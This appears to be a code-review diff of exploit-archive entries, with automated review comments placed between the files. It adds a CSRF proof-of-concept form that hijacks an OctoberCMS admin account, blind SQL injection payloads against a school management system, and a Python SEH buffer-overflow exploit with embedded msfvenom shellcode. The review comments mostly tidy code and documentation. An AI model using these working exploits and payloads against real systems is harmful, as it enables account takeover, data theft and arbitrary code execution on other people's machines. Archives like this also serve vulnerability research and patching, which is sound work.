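Review bot: `sutf8 = payload.encode('UTF-8')` is computed and never used; the file is written from the unicode `payload` instead, which only works because of the `reload(sys)` / `sys.setdefaultencoding("utf-8")` hack above it. Write `sutf8` (or open the file with `io.open(filename, 'w', encoding='utf-8')`), drop the `reload`/`setdefaultencoding` lines, and close the handle (`with open(filename, 'w') as f:`). On the documentation side, the header claims "remote memory corruption" but the only evidence in the file is a message built from 1337 repeats of an Arabic-letter run that crashes the app on receipt, which is the resource-exhaustion denial of service the Impact paragraph itself describes; either include the crash evidence (backtrace or device log) or narrow the title and description to DoS.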
49 platforms/php/webapps/43106.txt Executable file
@ -0,0 +1,49 @@
# Exploit Title: OctoberCMS 1.0.426 - CSRF to Admin Account Takover
# Vendor Homepage: https://octobercms.com
# Software Link: https://octobercms.com/download
# Exploit Author: Zain Sabahat
# Website: https://about.me/ZainSabahat
# Category: webapps
# CVE: CVE-2017-16244

1. Description

Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF Tokens for postback handling, allowing an attacker to successfully take over the victim's account.
The vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring.The researcher found a way to bypass this protection.After digging more in the Application he found a postback variable "_handler=" which could be used to perform CSRF without X-Headers.The CSRF Tokens were also not being validated when _handler parameter was used to make the request.
In short, this attack bypasses a protection mechanism involving X-CSRF headers and CSRF tokens via a certain _handler postback variable.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16244
https://vuldb.com/?id.108857

2. Proof of Concept
Below is the CSRF Exploit (.html) which can lead to the takeover of the Admin's Account upon successful execution.

<html>
<body>
<form action="http://host/backend/users/myaccount" method="POST">
<input type="hidden" name="_handler" value="onSave" />
<input type="hidden" name="User[login]" value="Admin" />
<input type="hidden" name="User[email]" value="Hacked@hacked.com" />
<input type="hidden" name="User[first_name]" value="Admin" />
<input type="hidden" name="User[last_name]" value="1337" />
<input type="hidden" name="User[password]" value="YourNewPassword" />
<input type="hidden" name="User[password_confirmation]" value="YourNewPassword" />
<input type="hidden" name="redirect" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Upon execution of this CSRF, the Admin Account details will be replaced by ours leading to complete hijacking of Admin Account.

3. Reference

https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0
https://vuldb.com/?id.108857

4. Solution

The vulnerability will be patched by the vendor in the next release of OctoberCMS.Following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0).



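Review bot: section 4 contradicts itself: it says the fix will arrive in the next release while pointing at an upstream commit as a "temporary fix". A commit on the project's own repository is the fix, not a workaround, so either name the build that ships it or, if none is out yet, describe the real interim mitigation, which per section 1 is validating the CSRF token on `_handler` postbacks the same way it is validated for other postbacks. Also fix "Takover" in the title and add the missing spaces after the full stops in the second paragraph of section 1.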
37 platforms/php/webapps/43108.txt Executable file
@ -0,0 +1,37 @@
# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection
# Date: 01.11.2017
# Vendor Homepage: http://iloveprograming.com/
# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system
# Demo: http://iloveprograming.com/view/login.php
# Version: 2.3.0
# Category: Webapps
# Tested on: Kali Linux 2.0
# Exploit Author: Giulio Comi
# Contact: https://<http://ihsan.net/>linkedin.com/in/giuliocomi
#Description

This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter.

# Proof of Concept:

http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload]


# Vulnerable Parameter: friend_index (GET)


Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg
Vector: AND [INFERENCE]

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])






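Review bot: the Contact URL in the header is mangled: `https://<http://ihsan.net/>linkedin.com/in/giuliocomi` has an unrelated autolink spliced into it, so drop the `<http://ihsan.net/>` fragment. The write-up also gives no fix: the two payloads show `friend_index` being concatenated as a quoted string into a WHERE clause on MySQL, so the remediation to state is a prepared statement with `friend_index` passed as a bound parameter in `view/friend_profile.php`. Minor: `#Description` is missing the space the other headings use.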
@ -24,13 +24,6 @@
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#

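Review bot: this hunk arrives without its file header and the rendered lines carry no `-`/`+` markers, so the reduction from 13 lines to 6 announced by `@ -24,13 +24,6 @@` cannot be checked against what is shown; please include the file path and the raw diff so the removed lines can be confirmed.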
53 platforms/windows/local/43104.py Executable file
@ -0,0 +1,53 @@
#!/usr/bin/python

###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 05-10-2017
# Exploit Author: Venkat Rajgor
# Vendor Homepage: http://www.divxtodvd.net/
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of evil.txt
#
##############################################################################
filename="evil.txt"

buffer = "\x41" * 1008 #Buffer

nSEH = "\xEB\x06\x90\x90" #short Jump

SEH = "\x59\x78\x03\x10" #SEH

badchars = "\x00\x0A\x0D\x1A" # Bad Chars

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c # Payload To Pop Calc

shell=(
"\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52"
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61"
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e"
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99"
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f"
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98"
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94"
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23"
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1"
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff"
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59"
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3"
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09"
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96")

evil = "\x90"*20 + shell

buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil


textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
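Review bot: `nSEH`, `SEH` and `badchars` are defined near the top and never used, and the first `buffer` assignment is overwritten: the final `buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil` re-assembles the same bytes from literals, so any later change to `nSEH` or `SEH` would be silently ignored. Build it as `buffer = "\x41"*1008 + nSEH + SEH + evil` or drop the earlier definitions. The bad-character list also disagrees with the generator: `badchars` includes `\x1A` while the msfvenom comment passes `-b "\x00\x0a\x0d"`, so one of the two is wrong. Finally, the SEH pointer `0x10037859` (`"\x59\x78\x03\x10"`) should be documented with the module it comes from and why that module was chosen (no SafeSEH, no ASLR), otherwise a reader cannot judge whether the exploit holds beyond the single "Tested On" platform.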